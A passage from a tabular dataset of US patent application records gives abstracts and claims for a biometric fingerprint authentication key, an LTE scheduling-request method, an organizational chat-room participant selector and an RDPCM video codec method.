Unnamed: 0 int64 0 350k | level_0 int64 0 351k | ApplicationNumber int64 9.75M 96.1M | ArtUnit int64 1.6k 3.99k | Abstract stringlengths 1 8.37k | Claims stringlengths 3 292k | abstract-claims stringlengths 68 293k | TechCenter int64 1.6k 3.9k |
|---|---|---|---|---|---|---|---|
9,100 | 9,100 | 16,551,243 | 2,438 | Systems and methods verifying a user during authentication of an integrated device. In one embodiment, the system includes an integrated device and an authentication unit. The integrated device stores biometric data of a user and a plurality of codes and other data values comprising a device ID code uniquely identifying the integrated device and a secret decryption value in a tamper proof format, and when scan data is verified by comparing the scan data to the biometric data, wirelessly sends one or more codes and other data values including the device ID code. The authentication unit receives and sends the one or more codes and the other data values to an agent for authentication, and receives an access message from the agent indicating that the agent successfully authenticated the one or more codes and other data values and allows the user to access an application. | 1. A method comprising:
storing, in a storage element of a user device, fingerprint data of a legitimate user, the user device having an identifier code uniquely identifying the user device; responsive to receiving a request for a fingerprint verification of the legitimate user, capturing scan data from a fingerprint scan using a biometric scanner of the user device; comparing the scan data to the fingerprint data to determine whether the scan data matches the fingerprint data; responsive to a determination that the scan data matches the fingerprint data, establishing a secure communication link between the user device and a reader device proximate to the user device for sending the identifier code uniquely identifying the user device from the user device to the reader device, the reader device sending the identifier code to a trusted authority server for authenticating the identifier code; and responsive to the trusted authority server successfully authenticating the identifier code, receiving a communication from the reader device that a transaction is allowed to complete. 2. The method of claim 1, wherein comparing the scan data to the fingerprint data further comprises comparing a unique pattern of ridges and valleys of a respective fingerprint in the scan data to the fingerprint data. 3. The method of claim 1, wherein the fingerprint data of the legitimate user is stored in encrypted form in the storage element and the identifier code uniquely identifying the user device is stored on the user device. 4. The method of claim 1, wherein the fingerprint data of the legitimate user and the identifier code uniquely identifying the user device are stored in a tamper proof format. 5. The method of claim 1, further comprising storing, in the storage element of the user device, an encryption key and a decryption key used for establishing the secure communication link, the secure communication link being wireless. 6. The method of claim 1, further comprising registering the user device with the trusted authority server. 7. The method of claim 1, wherein the identifier code uniquely identifying the user device is provided by the trusted authority server for storage on the user device. 8. The method of claim 1, wherein responsive to the determination that the scan data matches the fingerprint data, signaling a confirmation on the user device that the fingerprint verification is completed. 9. The method of claim 1, wherein the user device comprises one from a group of a mobile phone, a tablet, a laptop, a mp3 player, a mobile gaming device, a watch, and a key fob. 10. The method of claim 1, wherein the reader device is operable on a same system as one from a group of a casino machine, a keyless lock, an ATM machine, a computer, and a point of sale register. 11. The method of claim 1, wherein the storage element is a non-volatile storage element from a group of a read-only memory element and a flash memory element. 12. A system comprising:
a biometric key having a memory including instructions that, when executed by the biometric key, causes the system to:
store, in a storage element of the biometric key, fingerprint data of a legitimate user, the biometric key having an identifier code uniquely identifying the biometric key;
responsive to receiving a request for a fingerprint verification of the legitimate user, capture scan data from a fingerprint scan using a biometric scanner of the biometric key;
compare the scan data to the fingerprint data to determine whether the scan data matches the fingerprint data;
responsive to a determination that the scan data matches the fingerprint data, establish a secure communication link between the biometric key and a reader device proximate to the biometric key for sending the identifier code uniquely identifying the biometric key from the biometric key to the reader device, the reader device sending the identifier code to a trusted authority server for authenticating the identifier code; and
responsive to the trusted authority server successfully authenticating the identifier code, receive a communication from the reader device that a transaction is allowed to complete. 13. The system of claim 12, wherein to compare the scan data to the fingerprint data, the instructions, when executed, by the biometric key, further cause the system to compare a unique pattern of ridges and valleys of a respective fingerprint in the scan data to the fingerprint data. 14. The system of claim 12, wherein the fingerprint data of the legitimate user is stored in encrypted form in the storage element and the identifier code uniquely identifying the biometric key is stored on the biometric key. 15. The system of claim 12, wherein the fingerprint data of the legitimate user and the identifier code uniquely identifying the biometric key are stored in a tamper proof format. 16. The system of claim 12, wherein the instructions, when executed, by the biometric key, further cause the system to store, in the storage element of the biometric key, an encryption key and a decryption key used for establishing the secure communication link, the secure communication link being wireless. 17. The system of claim 12, wherein the instructions, when executed, by the biometric key, further cause the system to register the biometric key with the trusted authority server. 18. The system of claim 12, wherein the identifier code uniquely identifying the biometric key is provided by the trusted authority server for storage on the biometric key. 19. The system of claim 12, wherein the instructions, when executed, by the biometric key, further cause the system to signal a confirmation on the biometric key that the fingerprint verification is completed responsive to the determination that the scan data matches the fingerprint data. 20. The system of claim 12, wherein the storage element is a non-volatile storage element from a group of a read-only memory element and a flash memory element. | Systems and methods verifying a user during authentication of an integrated device. In one embodiment, the system includes an integrated device and an authentication unit. The integrated device stores biometric data of a user and a plurality of codes and other data values comprising a device ID code uniquely identifying the integrated device and a secret decryption value in a tamper proof format, and when scan data is verified by comparing the scan data to the biometric data, wirelessly sends one or more codes and other data values including the device ID code. The authentication unit receives and sends the one or more codes and the other data values to an agent for authentication, and receives an access message from the agent indicating that the agent successfully authenticated the one or more codes and other data values and allows the user to access an application.1. A method comprising:
storing, in a storage element of a user device, fingerprint data of a legitimate user, the user device having an identifier code uniquely identifying the user device; responsive to receiving a request for a fingerprint verification of the legitimate user, capturing scan data from a fingerprint scan using a biometric scanner of the user device; comparing the scan data to the fingerprint data to determine whether the scan data matches the fingerprint data; responsive to a determination that the scan data matches the fingerprint data, establishing a secure communication link between the user device and a reader device proximate to the user device for sending the identifier code uniquely identifying the user device from the user device to the reader device, the reader device sending the identifier code to a trusted authority server for authenticating the identifier code; and responsive to the trusted authority server successfully authenticating the identifier code, receiving a communication from the reader device that a transaction is allowed to complete. 2. The method of claim 1, wherein comparing the scan data to the fingerprint data further comprises comparing a unique pattern of ridges and valleys of a respective fingerprint in the scan data to the fingerprint data. 3. The method of claim 1, wherein the fingerprint data of the legitimate user is stored in encrypted form in the storage element and the identifier code uniquely identifying the user device is stored on the user device. 4. The method of claim 1, wherein the fingerprint data of the legitimate user and the identifier code uniquely identifying the user device are stored in a tamper proof format. 5. The method of claim 1, further comprising storing, in the storage element of the user device, an encryption key and a decryption key used for establishing the secure communication link, the secure communication link being wireless. 6. The method of claim 1, further comprising registering the user device with the trusted authority server. 7. The method of claim 1, wherein the identifier code uniquely identifying the user device is provided by the trusted authority server for storage on the user device. 8. The method of claim 1, wherein responsive to the determination that the scan data matches the fingerprint data, signaling a confirmation on the user device that the fingerprint verification is completed. 9. The method of claim 1, wherein the user device comprises one from a group of a mobile phone, a tablet, a laptop, a mp3 player, a mobile gaming device, a watch, and a key fob. 10. The method of claim 1, wherein the reader device is operable on a same system as one from a group of a casino machine, a keyless lock, an ATM machine, a computer, and a point of sale register. 11. The method of claim 1, wherein the storage element is a non-volatile storage element from a group of a read-only memory element and a flash memory element. 12. A system comprising:
a biometric key having a memory including instructions that, when executed by the biometric key, causes the system to:
store, in a storage element of the biometric key, fingerprint data of a legitimate user, the biometric key having an identifier code uniquely identifying the biometric key;
responsive to receiving a request for a fingerprint verification of the legitimate user, capture scan data from a fingerprint scan using a biometric scanner of the biometric key;
compare the scan data to the fingerprint data to determine whether the scan data matches the fingerprint data;
responsive to a determination that the scan data matches the fingerprint data, establish a secure communication link between the biometric key and a reader device proximate to the biometric key for sending the identifier code uniquely identifying the biometric key from the biometric key to the reader device, the reader device sending the identifier code to a trusted authority server for authenticating the identifier code; and
responsive to the trusted authority server successfully authenticating the identifier code, receive a communication from the reader device that a transaction is allowed to complete. 13. The system of claim 12, wherein to compare the scan data to the fingerprint data, the instructions, when executed, by the biometric key, further cause the system to compare a unique pattern of ridges and valleys of a respective fingerprint in the scan data to the fingerprint data. 14. The system of claim 12, wherein the fingerprint data of the legitimate user is stored in encrypted form in the storage element and the identifier code uniquely identifying the biometric key is stored on the biometric key. 15. The system of claim 12, wherein the fingerprint data of the legitimate user and the identifier code uniquely identifying the biometric key are stored in a tamper proof format. 16. The system of claim 12, wherein the instructions, when executed, by the biometric key, further cause the system to store, in the storage element of the biometric key, an encryption key and a decryption key used for establishing the secure communication link, the secure communication link being wireless. 17. The system of claim 12, wherein the instructions, when executed, by the biometric key, further cause the system to register the biometric key with the trusted authority server. 18. The system of claim 12, wherein the identifier code uniquely identifying the biometric key is provided by the trusted authority server for storage on the biometric key. 19. The system of claim 12, wherein the instructions, when executed, by the biometric key, further cause the system to signal a confirmation on the biometric key that the fingerprint verification is completed responsive to the determination that the scan data matches the fingerprint data. 20. The system of claim 12, wherein the storage element is a non-volatile storage element from a group of a read-only memory element and a flash memory element. | 2,400 |
9,101 | 9,101 | 15,565,436 | 2,467 | Briefly, in accordance with one or more embodiments, an apparatus of a user equipment (UE) comprises circuitry to configure a scheduling request (SR) transmission based on a physical uplink control channel (PUCCH), and combine the scheduling request with a buffer status report (BSR). The UE transmits the combined SR and BSR in a single subframe to a network entity, receives uplink resource scheduling from the network entity in reply to the combined SR and BSR, and transmits uplink data to the network entity according to the uplink resource scheduling. | 1-24. (canceled) 25. An apparatus of a user equipment (UE) comprising circuitry to:
configure a scheduling request (SR) transmission based on a physical uplink control channel (PUCCH); combine the scheduling request with a buffer status report (BSR); transmit the combined SR and BSR in a single subframe to a network entity; receive uplink resource scheduling from the network entity in reply to the combined SR and BSR; and transmit uplink data to the network entity according to the uplink resource scheduling. 26. The apparatus as claimed in claim 25, wherein the PUCCH comprises PUCCH format 1, PUCCH format 1b, PUCCH format 2, or PUCCH format 3, or a combination thereof. 27. The apparatus as claimed in claim 25, comprising radio-frequency circuitry to transmit a combined SR and BSR periodically. 28. The apparatus as claimed in claim 25, comprising radio-frequency circuitry to transmit the BSR as a payload of PUCCH format 2 or PUCCH format 3. 29. The apparatus as claimed in claim 25, comprising radio-frequency circuitry to:
transmit a channel state indicator (CSI) or an acknowledgement/negative acknowledgement (ACK/NACK) without transmitting the combined SR and BSR if the combined SR and BSR transmission collides with a CSI transmission or an ACK/NACK transmission in a same PUCCH resource. 30. The apparatus as claimed in claim 29, wherein one bit of the payload indicates an ACK/NACK and a discontinuous transmission (DTX) state, and another bit of the payload indicates a buffer status report group indicator (BSRGI). 31. The apparatus as claimed in claim 25, wherein the BSR is divided into two or more groups, and a threshold is configured by radio resource control (RRC) signaling or as defined by a Third Generation Partnership Project (3GPP) standard. 32. An apparatus of a user equipment (UE) comprising circuitry to:
configure a scheduling request (SR) transmission based on a physical uplink control channel (PUCCH); combine the scheduling request with a buffer status report group indicator (BSRGI); transmit the combined SR and BSRGI in a single subframe to a network entity; receive uplink resource scheduling from the network entity in reply to the combined SR and BSRGI; and transmit uplink data to the network entity according to the uplink resource scheduling. 33. The apparatus as claimed in 32, comprising radio-frequency circuitry to transmit the combined SR and BSRGI message based on PUCCH format 2. 34. The apparatus as claimed in claim 33, wherein the BSRGI comprises one bit or two bits at an end of a PUCCH format 2 payload. 35. The apparatus as claimed in claim 32, comprising radio-frequency circuitry to transmit the combined SR and BSRGI message transmitted with a periodic channel state indicator (CSI). 36. The apparatus as claimed in claim 32, wherein the SR is not transmitted if bits representing the BSRGI are all zeros. 37. One or more computer-readable media having instructions stored thereon that, if executed by user equipment (UE), result in:
configuring a scheduling request (SR) transmission based on a physical uplink control channel (PUCCH); combining the scheduling request with a buffer status report (BSR); transmitting the combined SR and BSR in a single subframe to a network entity; receiving uplink resource scheduling from the network entity in reply to the combined SR and BSR; and transmit uplink data to the network entity according to the uplink resource scheduling. 38. The one or more computer-readable media as claimed in claim 37, wherein the PUCCH comprises PUCCH format 1, PUCCH format 1b, PUCCH format 2, or PUCCH format 3, or a combination thereof. 39. The one or more computer-readable media as claimed in claim 37, wherein the instructions, if executed by the UE, result in transmitting a combined SR and BSR periodically. 40. The one or more computer-readable media as claimed in claim 37, wherein the instructions, if executed by the UE, result in transmitting the BSR as a payload of PUCCH format 2 or PUCCH format 3. 41. The one or more non-transitory computer-readable media as claimed in claim 13, wherein the instructions, if executed by the UE, result in:
transmitting a channel state indicator (CSI) or an acknowledgement/negative acknowledgement (ACK/NACK) without transmitting the combined SR and BSR if the combined SR and BSR transmission collides with a CSI transmission or an ACK/NACK transmission in a same PUCCH resource. 42. The one or more non-transitory computer-readable media as claimed in claim 41, wherein one bit of the payload indicates an ACK/NACK and a discontinuous transmission (DTX) state, and another bit of the payload indicates a buffer status report group indicator (BSRGI). 43. The one or more non-transitory computer-readable media as claimed in claim 37, wherein the BSR is divided into two or more groups, and a threshold is configured by radio resource control (RRC) signaling as defined by a Third Generation Partnership Project (3GPP) standard. 44. One or more non-transitory computer-readable media having instructions stored thereon that, if executed by user equipment (UE), result in:
configuring a scheduling request (SR) transmission based on a physical uplink control channel (PUCCH); combining the scheduling request with a buffer status report group indicator (BSRGI); transmitting the combined SR and BSRGI in a single subframe to a network entity; receiving uplink resource scheduling from the network entity in reply to the combined SR and BSRGI; and transmitting uplink data to the network entity according to the uplink resource scheduling. 45. The one or more non-transitory computer-readable media as claimed in claim 44, wherein the instructions, if executed by the UE, result in transmitting the combined SR and BSRGI message based on PUCCH format 2. 46. The one or more non-transitory computer-readable media as claimed in claim 45, wherein the BSRGI comprises one bit or two bits at an end of a PUCCH format 2 payload. 47. The one or more non-transitory computer-readable media as claimed in claim 44, wherein the instructions, if executed by the UE, result in transmitting the combined SR and BSRGI message transmitted with a periodic channel state indicator (CSI). 48. The one or more non-transitory computer-readable media as claimed in claim 44, wherein the SR is not transmitted if bits representing the BSRGI are all zeros. | Briefly, in accordance with one or more embodiments, an apparatus of a user equipment (UE) comprises circuitry to configure a scheduling request (SR) transmission based on a physical uplink control channel (PUCCH), and combine the scheduling request with a buffer status report (BSR). The UE transmits the combined SR and BSR in a single subframe to a network entity, receives uplink resource scheduling from the network entity in reply to the combined SR and BSR, and transmits uplink data to the network entity according to the uplink resource scheduling.1-24. (canceled) 25. An apparatus of a user equipment (UE) comprising circuitry to:
configure a scheduling request (SR) transmission based on a physical uplink control channel (PUCCH); combine the scheduling request with a buffer status report (BSR); transmit the combined SR and BSR in a single subframe to a network entity; receive uplink resource scheduling from the network entity in reply to the combined SR and BSR; and transmit uplink data to the network entity according to the uplink resource scheduling. 26. The apparatus as claimed in claim 25, wherein the PUCCH comprises PUCCH format 1, PUCCH format 1b, PUCCH format 2, or PUCCH format 3, or a combination thereof. 27. The apparatus as claimed in claim 25, comprising radio-frequency circuitry to transmit a combined SR and BSR periodically. 28. The apparatus as claimed in claim 25, comprising radio-frequency circuitry to transmit the BSR as a payload of PUCCH format 2 or PUCCH format 3. 29. The apparatus as claimed in claim 25, comprising radio-frequency circuitry to:
transmit a channel state indicator (CSI) or an acknowledgement/negative acknowledgement (ACK/NACK) without transmitting the combined SR and BSR if the combined SR and BSR transmission collides with a CSI transmission or an ACK/NACK transmission in a same PUCCH resource. 30. The apparatus as claimed in claim 29, wherein one bit of the payload indicates an ACK/NACK and a discontinuous transmission (DTX) state, and another bit of the payload indicates a buffer status report group indicator (BSRGI). 31. The apparatus as claimed in claim 25, wherein the BSR is divided into two or more groups, and a threshold is configured by radio resource control (RRC) signaling or as defined by a Third Generation Partnership Project (3GPP) standard. 32. An apparatus of a user equipment (UE) comprising circuitry to:
configure a scheduling request (SR) transmission based on a physical uplink control channel (PUCCH); combine the scheduling request with a buffer status report group indicator (BSRGI); transmit the combined SR and BSRGI in a single subframe to a network entity; receive uplink resource scheduling from the network entity in reply to the combined SR and BSRGI; and transmit uplink data to the network entity according to the uplink resource scheduling. 33. The apparatus as claimed in 32, comprising radio-frequency circuitry to transmit the combined SR and BSRGI message based on PUCCH format 2. 34. The apparatus as claimed in claim 33, wherein the BSRGI comprises one bit or two bits at an end of a PUCCH format 2 payload. 35. The apparatus as claimed in claim 32, comprising radio-frequency circuitry to transmit the combined SR and BSRGI message transmitted with a periodic channel state indicator (CSI). 36. The apparatus as claimed in claim 32, wherein the SR is not transmitted if bits representing the BSRGI are all zeros. 37. One or more computer-readable media having instructions stored thereon that, if executed by user equipment (UE), result in:
configuring a scheduling request (SR) transmission based on a physical uplink control channel (PUCCH); combining the scheduling request with a buffer status report (BSR); transmitting the combined SR and BSR in a single subframe to a network entity; receiving uplink resource scheduling from the network entity in reply to the combined SR and BSR; and transmit uplink data to the network entity according to the uplink resource scheduling. 38. The one or more computer-readable media as claimed in claim 37, wherein the PUCCH comprises PUCCH format 1, PUCCH format 1b, PUCCH format 2, or PUCCH format 3, or a combination thereof. 39. The one or more computer-readable media as claimed in claim 37, wherein the instructions, if executed by the UE, result in transmitting a combined SR and BSR periodically. 40. The one or more computer-readable media as claimed in claim 37, wherein the instructions, if executed by the UE, result in transmitting the BSR as a payload of PUCCH format 2 or PUCCH format 3. 41. The one or more non-transitory computer-readable media as claimed in claim 13, wherein the instructions, if executed by the UE, result in:
transmitting a channel state indicator (CSI) or an acknowledgement/negative acknowledgement (ACK/NACK) without transmitting the combined SR and BSR if the combined SR and BSR transmission collides with a CSI transmission or an ACK/NACK transmission in a same PUCCH resource. 42. The one or more non-transitory computer-readable media as claimed in claim 41, wherein one bit of the payload indicates an ACK/NACK and a discontinuous transmission (DTX) state, and another bit of the payload indicates a buffer status report group indicator (BSRGI). 43. The one or more non-transitory computer-readable media as claimed in claim 37, wherein the BSR is divided into two or more groups, and a threshold is configured by radio resource control (RRC) signaling as defined by a Third Generation Partnership Project (3GPP) standard. 44. One or more non-transitory computer-readable media having instructions stored thereon that, if executed by user equipment (UE), result in:
configuring a scheduling request (SR) transmission based on a physical uplink control channel (PUCCH); combining the scheduling request with a buffer status report group indicator (BSRGI); transmitting the combined SR and BSRGI in a single subframe to a network entity; receiving uplink resource scheduling from the network entity in reply to the combined SR and BSRGI; and transmitting uplink data to the network entity according to the uplink resource scheduling. 45. The one or more non-transitory computer-readable media as claimed in claim 44, wherein the instructions, if executed by the UE, result in transmitting the combined SR and BSRGI message based on PUCCH format 2. 46. The one or more non-transitory computer-readable media as claimed in claim 45, wherein the BSRGI comprises one bit or two bits at an end of a PUCCH format 2 payload. 47. The one or more non-transitory computer-readable media as claimed in claim 44, wherein the instructions, if executed by the UE, result in transmitting the combined SR and BSRGI message transmitted with a periodic channel state indicator (CSI). 48. The one or more non-transitory computer-readable media as claimed in claim 44, wherein the SR is not transmitted if bits representing the BSRGI are all zeros. | 2,400 |
9,102 | 9,102 | 16,058,186 | 2,449 | A method includes receiving a user electronic input. The user electronic input is selected from a group consisting of logical rules, queries, and a subject matter. A degree of flexibility that is associated with the user electronic input is received from a user. Participants within an organization are identified based on the received user electronic input and further based on the degree of flexibility. An electronic chat room that includes at least a subset of the identified participants is created. | 1. A method comprising:
receiving an electronic user input, wherein the electronic user input is selected from a group consisting of logical rules, queries, and a subject matter; receiving a degree of flexibility from a user via a graphical user interface (GUI), wherein the degree of flexibility is an indication of desired conciseness of the electronic user input; identifying participants within an organization based on the received electronic user input and further based on the degree of flexibility; and creating an online chat room that includes at least a subset of the identified participants. 2. The method as described in claim 1 further comprising updating the identified participants by adding or removing participants within the organization over time and further updating the participants of the subset of the identified participants of the online chat room, wherein the updating is responsive to content of conversation within the online chat room. 3. The method as described in claim 1 further comprising updating the identified participants within the organization over time, wherein the updating is responsive to changes within the organization. 4. The method as described in claim 3, wherein the changes are selected from a group consisting of changes to title, changes to projects, and changes to participants of a group within the organization. 5. The method as described in claim 4 further comprising updating participants of the subset of the identified participants within the online chat room responsive to the changes. 6. The method as described in claim 1, wherein the identifying comprises utilizing machine learning and artificial intelligence to identify the participants. 7. The method as described in claim 1, wherein the identifying is further based on participants of the organization's past projects, expertise, educational degree, department within the organization, title, and interest. 8. A method comprising:
receiving a user input, wherein the user input is selected from a group consisting of logical rules and queries; identifying participants within an organization based on the user input; and creating a chat room that includes at least a subset of the identified participants. 9. The method as described in claim 8 further comprising updating the identified participants within the organization over time and further updating the participants of the subset of the identified participants of the chat room, wherein the updating is responsive to content of conversation within the chat room. 10. The method as described in claim 8 further comprising updating the identified participants within the organization over time, wherein the updating is responsive to changes within the organization. 11. The method as described in claim 10, wherein the changes is selected from a group consisting of changes to title, changes to projects, and changes to participants of a group within the organization. 12. The method as described in claim 11 further comprising updating participants of the subset of the identified participants within the chat room responsive to the changes. 13. The method as described in claim 8, wherein the identifying comprises utilizing machine learning and artificial intelligence to identify the participants. 14. The method as described in claim 8, wherein the identifying is further based on participants of the organization's past projects, expertise, educational degree, department within the organization, title, and interest. 15. A method comprising:
receiving a user input, wherein the user input comprises a subject matter; identifying participants within an organization based on the subject matter of the user input; and creating a chat room that includes at least a subset of the identified participants. 16. The method as described in claim 15 further comprising updating the identified participants within the organization over time and further updating the participants of the subset of the identified participants of the chat room, wherein the updating is responsive to content of conversation within the chat room. 17. The method as described in claim 15 further comprising updating the identified participants within the organization over time, wherein the updating is responsive to changes within the organization. 18. The method as described in claim 17, wherein the changes is selected from a group consisting of changes to title, changes to projects, and changes to participants of a group within the organization. 19. The method as described in claim 18 further comprising updating participants of the subset of the identified participants within the chat room responsive to the changes. 20. The method as described in claim 15, wherein the identifying comprises utilizing machine learning and artificial intelligence to identify the participants. | A method includes receiving a user electronic input. The user electronic input is selected from a group consisting of logical rules, queries, and a subject matter. A degree of flexibility that is associated with the user electronic input is received from a user. Participants within an organization are identified based on the received user electronic input and further based on the degree of flexibility. An electronic chat room that includes at least a subset of the identified participants is created.1. A method comprising:
receiving an electronic user input, wherein the electronic user input is selected from a group consisting of logical rules, queries, and a subject matter; receiving a degree of flexibility from a user via a graphical user interface (GUI), wherein the degree of flexibility is an indication of desired conciseness of the electronic user input; identifying participants within an organization based on the received electronic user input and further based on the degree of flexibility; and creating an online chat room that includes at least a subset of the identified participants. 2. The method as described in claim 1 further comprising updating the identified participants by adding or removing participants within the organization over time and further updating the participants of the subset of the identified participants of the online chat room, wherein the updating is responsive to content of conversation within the online chat room. 3. The method as described in claim 1 further comprising updating the identified participants within the organization over time, wherein the updating is responsive to changes within the organization. 4. The method as described in claim 3, wherein the changes are selected from a group consisting of changes to title, changes to projects, and changes to participants of a group within the organization. 5. The method as described in claim 4 further comprising updating participants of the subset of the identified participants within the online chat room responsive to the changes. 6. The method as described in claim 1, wherein the identifying comprises utilizing machine learning and artificial intelligence to identify the participants. 7. The method as described in claim 1, wherein the identifying is further based on participants of the organization's past projects, expertise, educational degree, department within the organization, title, and interest. 8. A method comprising:
receiving a user input, wherein the user input is selected from a group consisting of logical rules and queries; identifying participants within an organization based on the user input; and creating a chat room that includes at least a subset of the identified participants. 9. The method as described in claim 8 further comprising updating the identified participants within the organization over time and further updating the participants of the subset of the identified participants of the chat room, wherein the updating is responsive to content of conversation within the chat room. 10. The method as described in claim 8 further comprising updating the identified participants within the organization over time, wherein the updating is responsive to changes within the organization. 11. The method as described in claim 10, wherein the changes is selected from a group consisting of changes to title, changes to projects, and changes to participants of a group within the organization. 12. The method as described in claim 11 further comprising updating participants of the subset of the identified participants within the chat room responsive to the changes. 13. The method as described in claim 8, wherein the identifying comprises utilizing machine learning and artificial intelligence to identify the participants. 14. The method as described in claim 8, wherein the identifying is further based on participants of the organization's past projects, expertise, educational degree, department within the organization, title, and interest. 15. A method comprising:
receiving a user input, wherein the user input comprises a subject matter; identifying participants within an organization based on the subject matter of the user input; and creating a chat room that includes at least a subset of the identified participants. 16. The method as described in claim 15 further comprising updating the identified participants within the organization over time and further updating the participants of the subset of the identified participants of the chat room, wherein the updating is responsive to content of conversation within the chat room. 17. The method as described in claim 15 further comprising updating the identified participants within the organization over time, wherein the updating is responsive to changes within the organization. 18. The method as described in claim 17, wherein the changes is selected from a group consisting of changes to title, changes to projects, and changes to participants of a group within the organization. 19. The method as described in claim 18 further comprising updating participants of the subset of the identified participants within the chat room responsive to the changes. 20. The method as described in claim 15, wherein the identifying comprises utilizing machine learning and artificial intelligence to identify the participants. | 2,400 |
9,103 | 9,103 | 14,469,477 | 2,485 | In an example, a method of decoding video data includes generating a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block. The method also includes generating a current block of the picture based on a combination of the residual block and a prediction block of the picture. | 1. A method of decoding video data, the method comprising:
generating a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block; and generating a current block of the picture based on a combination of the residual block and a prediction block of the picture. 2. The method of claim 1, further comprising obtaining the predicted residual block from an encoded bitstream, and wherein generating the residual block comprises applying residual differential pulse code modulation (RDPCM) to the predicted residual block. 3. The method of claim 2, wherein applying the RDPCM to the predicted residual block comprises applying horizontal RDPCM to the one or more predicted residual values. 4. The method of claim 2, wherein applying the RDPCM to the predicted residual block comprises applying vertical RDPCM to the one or more predicted residual values. 5. The method of claim 2, wherein applying the RDPCM comprises obtaining, from the encoded bitstream, data that indicates an RDPCM mode from a plurality of RDPCM modes and applying the indicated RDPCM mode. 6. The method of claim 5, wherein obtaining the data that indicates an RDPCM mode comprises obtaining data that indicates at least one of an RDPCM off mode, an RDPCM vertical mode, and an RDPCM horizontal mode. 7. The method of claim 1, further comprising:
obtaining, from an encoded bitstream, a displacement vector that indicates a location of the prediction block in the picture; and locating the prediction block of the picture using the displacement vector. 8. The method of claim 1, wherein generating the residual block further comprises applying inverse quantization to the residual block in a lossy decoding process. 9. The method of claim 1, wherein generating the residual block comprises generating the residual block without performing inverse quantization in a lossless decoding process. 10. The method of claim 1, further comprising decoding one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the step of generating the residual block of the picture based on the predicted residual block. 11. The method of claim 10, wherein decoding the one or more syntax elements comprises decoding the one or more syntax elements at a sequence level in a sequence parameter set (SPS). 12. The method of claim 10, wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an inter-prediction mode and an intra-BC prediction mode. 13. A method of encoding video data, the method comprising:
generating a residual block for a current block of a picture based on a difference between the current block and a prediction block of the picture; generating a predicted residual block based on the residual block by predicting one or more residual values of the residual block based on one or more other residual values of the residual block; and encoding data that represents the predicted residual block in a bitstream. 14. The method of claim 13, wherein generating the predicted residual block comprises applying residual differential pulse code modulation (RDPCM) to the residual block. 15. The method of claim 14, wherein applying the RDPCM to the residual block comprises applying horizontal RDPCM to the one or more residual values. 16. The method of claim 14, wherein applying the RDPCM to the predicted residual block comprises applying vertical RDPCM to the one or more residual values. 17. The method of claim 14, wherein applying the RDPCM comprises selecting an RDPCM mode from a plurality of RDPCM modes and applying the selected RDPCM mode, the method further comprising encoding data that indicates the selected RDPCM mode. 18. The method of claim 17, wherein encoding data that indicates the selected RDPCM mode comprises encoding data that indicates at least one of an RDPCM off mode, an RDPCM vertical mode, and an RDPCM horizontal mode. 19. The method of claim 13, wherein generating the residual block comprises applying an intra-block copying (intra-BC) process to generate the residual block, wherein applying the intra-BC process comprises determining a region of the picture from which to select the prediction block, and determining a displacement vector that identifies the prediction block, the method further comprising encoding data that represents the displacement vector. 20. The method of claim 13, wherein encoding the data comprises applying quantization to the predicted residual block in a lossy encoding process. 21. The method of claim 13, wherein encoding the data comprises encoding the data without applying quantization to the predicted residual in a lossless encoding process. 22. The method of claim 13, further comprising encoding one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the step of generating the predicted residual block. 23. The method of claim 22, wherein encoding the one or more syntax elements comprises encoding the one or more syntax elements at a sequence level in a sequence parameter set (SPS). 24. The method of claim 22, wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an intra-BC mode and an inter-prediction mode. 25. A device for of decoding video data, the device comprising:
a memory configured to store the video data; and a video decoder configured to:
generate a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block; and
generate a current block of the picture based on a combination of the residual block and a prediction block of the picture. 26. The device of claim 25, wherein the video decoder is further configured to obtain the predicted residual block from an encoded bitstream, and wherein to generate the residual block, the video decoder is configured to apply residual differential pulse code modulation (RDPCM) to the predicted residual block. 27. The device of claim 26, wherein to apply the RDPCM to the predicted residual block, the video decoder is configured to apply horizontal RDPCM to the one or more predicted residual values. 28. The device of claim 26, wherein to apply the RDPCM to the predicted residual block, the video decoder is configured to apply vertical RDPCM to the one or more predicted residual values. 29. The device of claim 26, wherein to apply the RDPCM, the video decoder is configured to obtain, from the encoded bitstream, data that indicates an RDPCM mode from a plurality of RDPCM modes and applying the indicated RDPCM mode. 30. The device of claim 29, wherein to obtain the data that indicates an RDPCM mode, the video decoder is configured to obtain data that indicates at least one of an RDPCM off mode, an RDPCM vertical mode, and an RDPCM horizontal mode. 31. The device of claim 25, wherein the video decoder is further configured to:
obtain, from an encoded bitstream, a displacement vector that indicates a location of the prediction block in the picture; and locate the prediction block of the picture using the displacement vector. 32. The device of claim 25, wherein to generate the residual block, the video decoder is configured to apply inverse quantization to the residual block in a lossy decoding process. 33. The device of claim 25, wherein to generate the residual block, the video decoder is configured to generate the residual block without performing inverse quantization in a lossless decoding process. 34. The device of claim 25, wherein the video decoder is further configured to decode one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the residual block of the picture based on the predicted residual block. 35. The device of claim 34, wherein to decode the one or more syntax elements, the video decoder is configured to decode the one or more syntax elements at a sequence level in a sequence parameter set (SPS). 36. The device of claim 34, wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an inter-prediction mode and an intra-BC prediction mode. 37. The device of claim 25, further comprising a display configured to display the current block of the picture. 38. A device for encoding video data, the device comprising:
a memory configured to store the video data; a video encoder configured to:
generate a residual block for a current block of a picture based on a difference between the current block and a prediction block of the picture;
generate a predicted residual block based on the residual block by predicting one or more residual values of the residual block based on one or more other residual values of the residual block; and
